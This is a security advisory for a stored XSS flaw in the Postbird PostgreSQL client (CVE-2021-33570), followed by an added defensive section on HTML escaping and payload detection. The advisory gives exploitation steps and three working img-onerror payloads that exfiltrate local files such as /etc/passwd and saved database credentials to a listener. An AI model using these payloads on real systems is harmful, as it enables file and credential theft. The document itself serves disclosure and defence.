CVE-2021-33570: GitHub - Tridentsec-io/postbird

Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.


Postbird [CVE-2021-33570]

On 17 May 2021, the Tridentsec team discovered a stored XSS vulnerability in Postbird version 0.8.4. The vulnerability is very Critical, and exploiting it can lead to a Data Breach. We were able to inject malicious JavaScript into the application, which led us to two further vulnerabilities: Local File Inclusion (LFI) and PostgreSQL password stealing. Postbird is a cross-platform PostgreSQL GUI client built on the electron.js framework and is widely used by organizations as well as individuals.

Exploitation

In order to exploit the vulnerability, we need to inject a malicious JavaScript payload into any table present in the PostgreSQL database. When the table loads in the Postbird application, the JavaScript code is executed automatically in the background. In a real scenario, a hacker could plant this JavaScript through a website that stores raw HTML into the database, and then steal files and PostgreSQL credentials.

Run our postbird.py Proof-of-Concept code before executing the attack. postbird.py acts as the fake malicious server a hacker would deploy to receive the stolen data.

Follow the below steps to exploit the vulnerability:

  • Open Postbird application.
  • Input the payload into any table as data.
  • Deploy our postbird.py Proof-of-Concept code using the command python3 postbird.py
  • Reload the table/application to trigger the vulnerability.
  • Check the data received on the postbird.py server.

XSS Payload

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1:5555/?xss='+JSON.stringify(navigator.appVersion), true);xhttp.send();">

LFI Payload

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'file:///etc/passwd', false);xhttp.send();var res = xhttp.response;xhttp.open('GET', 'http://127.0.0.1:5555/?file='+JSON.stringify(res), true);xhttp.send();">

PostgreSQL Password Stealing Payload

<img src="" onerror="var xhttp = new XMLHttpRequest();xhttp.open('GET', 'http://127.0.0.1:5555/?credentials='+window.localStorage.savedConnections, true);xhttp.send();">
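The rendering flaw behind these payloads, as an added example that is not code from the advisory or from Postbird: a hypothetical grid renderer that concatenates cell values into HTML, beside the escaping that neutralises stored markup, plus a heuristic a DBA could run over rows to spot cells carrying event-handler attributes. The function names and the sample row are constructed for this example.

```javascript
// Added example, not Postbird's code: renderCellUnsafe is a hypothetical
// stand-in for a grid that builds cell HTML by string concatenation.

// Constructed sample row: a payload of the advisory's shape stored as data.
const SAMPLE_ROW = {
  id: 7,
  comment: '<img src="" onerror="alert(1)">',
};

// Vulnerable pattern: the cell value is dropped straight into markup, so any
// tag in the value, including its on* handlers, becomes live DOM on load.
function renderCellUnsafe(value) {
  return `<td>${String(value)}</td>`;
}

// Fix: escape the five characters that can change HTML context, so a stored
// value is always rendered as text no matter what it contains.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderCellSafe(value) {
  return `<td>${escapeHtml(value)}</td>`;
}

// Detection aid: flag a value containing a tag with an on* attribute, the
// shape of the advisory's payloads. A heuristic for triage, not an HTML parser.
function looksLikeEventHandlerPayload(value) {
  return /<\s*[a-z][^>]*\son[a-z]+\s*=/i.test(String(value));
}

// Scan every cell of a row and return the column names that trip the heuristic.
function flagSuspiciousColumns(row) {
  return Object.keys(row).filter((k) => looksLikeEventHandlerPayload(row[k]));
}

console.log('unsafe:', renderCellUnsafe(SAMPLE_ROW.comment));
console.log('safe:  ', renderCellSafe(SAMPLE_ROW.comment));
console.log('flagged columns:', flagSuspiciousColumns(SAMPLE_ROW));
```

Escaping closes the injection point; the file:/// read and localStorage access in the payloads only work because the injected script runs with the Electron renderer's own privileges.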

References:

  • CVE-2021-33570
  • https://nvd.nist.gov/vuln/detail/CVE-2021-33570
  • https://github.com/Tridentsec-io/postbird
  • https://www.exploit-db.com/exploits/49910
  • Paxa/postbird#132
  • Paxa/postbird#133
  • Paxa/postbird#134
